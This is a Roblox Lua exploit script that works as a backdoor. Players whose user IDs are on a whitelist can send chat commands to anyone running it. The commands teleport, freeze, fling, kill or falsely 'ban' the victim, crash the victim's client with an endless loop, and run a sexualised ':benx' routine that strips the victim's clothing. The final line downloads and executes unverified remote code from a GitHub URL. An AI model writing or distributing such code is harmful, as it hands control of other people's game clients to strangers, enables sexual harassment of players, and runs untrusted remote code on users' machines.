--liat
local List = {
  1779272417, -- Dady bossu
  --/3527896844, -- Lol
  --/2221744361, --AlexCuBoblox
  --/3724304963,
  --/1 --Boblox
}
local player = game.Players.LocalPlayer
local Players = game.Players


--Variables
  local function commands(msg,plr)
  if DisableMod == false or table.find(List, plr) then
      local Mod = game:GetService('Players'):GetPlayerByUserId(plr)
      local Msg = string.lower(msg)
      local SplitCMD = string.split(Msg,' ')
      local Lower = string.lower(player.Name)
      local Allowed = string.find(Lower, SplitCMD[2])
      if Allowed then 
------------------------------------- 
      if string.find(SplitCMD[1],':bank') then
        local ISADMIN = table.find(List, player.UserId)
              if not ISADMIN then
          player.Character.HumanoidRootPart.CFrame = CFrame.new(-450.891083, 23.2693825, -282.655121, 0.326025695, 7.47186135e-08, -0.945360899, -7.76462272e-08, 1, 5.22593524e-08, 0.945360899, 5.63658169e-08, 0.326025695)
        end
      end
      if string.find(SplitCMD[1],':benx') then
        bending = true
                local segtarget = Mod.Name
                local Crouch = player.Character:FindFirstChildWhichIsA('Humanoid'):LoadAnimation(game:GetService("ReplicatedStorage").ClientAnimations.Crouching)
                Crouch.Looped = true
                Crouch:Play()
                local away = .5
                local reversing = false
                local shirt = player.Character:FindFirstChild('Shirt')
                local pants = player.Character:FindFirstChild('Pants')
                if shirt then
                    shirt:Destroy()
                end
                if pants then
                    pants:Destroy()
                end
                local Loop
                local loopFunction = function()
                    local targetchar = game.Workspace.Players:FindFirstChild(segtarget) or game.Workspace:FindFirstChild(segtarget)
                    local character = player.Character
                    if targetchar then
                        if reversing == true then
                            away = away - 0.1
                        else
                            away = away + 0.1
                        end
                        if away >= 2 then
                            reversing = true
                        elseif away < 0.5 then
                            reversing = false
                        end
                        character.HumanoidRootPart.CFrame = game.Players[segtarget].Character.HumanoidRootPart.CFrame + game.Players[segtarget].Character.HumanoidRootPart.CFrame.lookVector * away
                    end
                end;
                local Start = function()
                    Loop = game:GetService("RunService").Heartbeat:Connect(loopFunction);
                end;
                local Pause = function()
                    Loop:Disconnect()
                    Crouch:Stop()
                end;
                Start()	
                repeat wait() until bending == false
                Pause()
            end
            if string.find(SplitCMD[1], ':unbenx') then
                while bending == true do
                    wait()
                    bending = false
                end
      end
--------------------------------------
      if string.find(SplitCMD[1],':grave') then
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.UpperTorso.Position.X, game.Players.LocalPlayer.Character.UpperTorso.Position.Y -30, game.Players.LocalPlayer.Character.UpperTorso.Position.z)
			game.Players.LocalPlayer.Character.LowerTorso.Anchored = true
          end
if string.find(SplitCMD[1],':ungrave') then
game.Players.LocalPlayer.Character.LowerTorso.Anchored = false
			wait(0.1)
			game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.UpperTorso.Position.X, game.Players.LocalPlayer.Character.UpperTorso.Position.Y +30, game.Players.LocalPlayer.Character.UpperTorso.Position.z)
		end 
------------------------------------- 
      if string.find(SplitCMD[1],':void') then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(0, -350, 0)
          end
--------------------------------------
          if string.find(SplitCMD[1], ':freeze') then
              player.Character.HumanoidRootPart.Anchored = true
          end
          if string.find(SplitCMD[1], ':unfreeze') or string.find(SplitCMD[1], ':thaw') then
              player.Character.HumanoidRootPart.Anchored = false
          end
--------------------------------------
          if string.find(SplitCMD[1], ':kick') then
              local ISADMIN = table.find(List, player.UserId)
              if not ISADMIN then
                  player:Kick("Kicked by: "..Mod.Name.."")
                  wait(5)
                  while true do end
              end
          end
      if string.find(SplitCMD[1], ':permban') then
              local ISADMIN = table.find(List, player.UserId)
              if not ISADMIN then
                  player:Kick("PERMA BAN")
                  wait(5)
                  while true do end
              end
      end
--------------------------------------
          if string.find(SplitCMD[1], ':bring') then
              player.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players:FindFirstChild(Mod.Name).Character.HumanoidRootPart.Position)
          end
--------------------------------------
          if string.find(SplitCMD[1], ':fling') then
              player.Character.HumanoidRootPart.Velocity = Vector3.new(500000,500000,500000)
          end
--------------------------------------
          if string.find(SplitCMD[1], ':kill') then
              player.Character:FindFirstChildOfClass("Humanoid"):Destroy()
          end
--------------------------------------
          if string.find(SplitCMD[1], ':sit') then
              player.Character:FindFirstChild("Humanoid").Sit = true
          end
      if string.find(SplitCMD[1],':unsit') then
player.character:FindFirstChild("Humanoid").Sit = false 
      end
--------------------------------------
          if string.find(SplitCMD[1], ':bug') then
              player:Destroy()
          end
--------------------------------------
          if string.find(SplitCMD[1], ':checkuser') then
            local ISADMIN = table.find(List, player.UserId)
              if not ISADMIN then
                    local args = {[1] = "/w "..Mod.Name.." Lol",[2] = "All"}
                    game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
              end
          end
      else
          if string.find(msg, ':check cmds') or string.find(msg, ':check commands') then
              print("\n---...Lejend#0684...---")
              print("\n:check cmds / m!check commands\nm!check users\n:checkuser [user]\n:bring [user]\n:bug [user]\n:fling [user]\n:freeze [user]\n:unfreeze [user]\n:thaw [user]\n:kick [user]\n:kill [user]\n:sit [user]\n:ban [user]")
              print("\n --..--..--..--..--..--..--..--..-- ")
          end
          if string.find(msg, ':check users') then
            local ISADMIN = table.find(List, player.UserId)
              if not ISADMIN then
                    local args = {[1] = "/w "..Mod.Name.." Lol",[2] = "All"}
                    game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args))
              end
          end
      end
  end
  end
--------------------------------------

  muted = {}
  mutingnew = false 


  Players.PlayerAdded:Connect(function(plr)
  local PREMS = table.find(List, plr.UserId)
  if PREMS then
      plr.CharacterAdded:Connect(function()
          if plr.Name ~= "EzyAlexBoss" and plr.Name ~= "bossu20112" then
plr.Character:WaitForChild("Humanoid").DisplayName = "[⭐]"..plr.Character:FindFirstChild("Humanoid").DisplayName
          else     plr.Character:WaitForChild("Humanoid").DisplayName = "[⭐]"..plr.Character:FindFirstChild("Humanoid").DisplayName
          end
      end)
  end
  if muteingnew == true then
      if not table.find(muted, plr.Name) then
          table.insert(muted, plr.Name)
          print('automuted ' .. plr.Name)
      end
  end
  end)

  for i,v in pairs(game:GetService('Players'):GetChildren()) do
  local PREMS = table.find(List, v.UserId)
  if PREMS then
      wait(5)
      if v.Name ~= "Disabled" and v.Name ~= "Disabled" then
Players[v.Name].Character:WaitForChild("Humanoid").DisplayName = "[⭐]"..Players[v.Name].Character:FindFirstChild("Humanoid").DisplayName
      Players[v.Name].CharacterAdded:Connect(function()      Players[v.Name].Character:WaitForChild("Humanoid").DisplayName = "[⭐]"..Players[v.Name].Character:FindFirstChild("Humanoid").DisplayName
      end)
    else   Players[v.Name].Character:WaitForChild("Humanoid").DisplayName = "[⭐]"..Players[v.Name].Character:FindFirstChild("Humanoid").DisplayName
      Players[v.Name].CharacterAdded:Connect(function()
Players[v.Name].Character:WaitForChild("Humanoid").DisplayName = "[⭐]"..Players[v.Name].Character:FindFirstChild("Humanoid").DisplayName
      end)
      end
  end
  end
  
local chatevent = game.ReplicatedStorage.DefaultChatSystemChatEvents
chatevent.OnMessageDoneFiltering.OnClientEvent:Connect(function(Table)
plr = game.Players[""..Table.FromSpeaker..""]
msg = Table.Message
local PREMS = table.find(List, plr.UserId)
if PREMS then
    commands(msg, plr.UserId)
end
end)
----------------------------------------------------------------------------
--[[
	WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
]]
loadstring(game:HttpGet("https://raw.githubusercontent.com/Allvideo/test/main/Whitelist.txt"))()
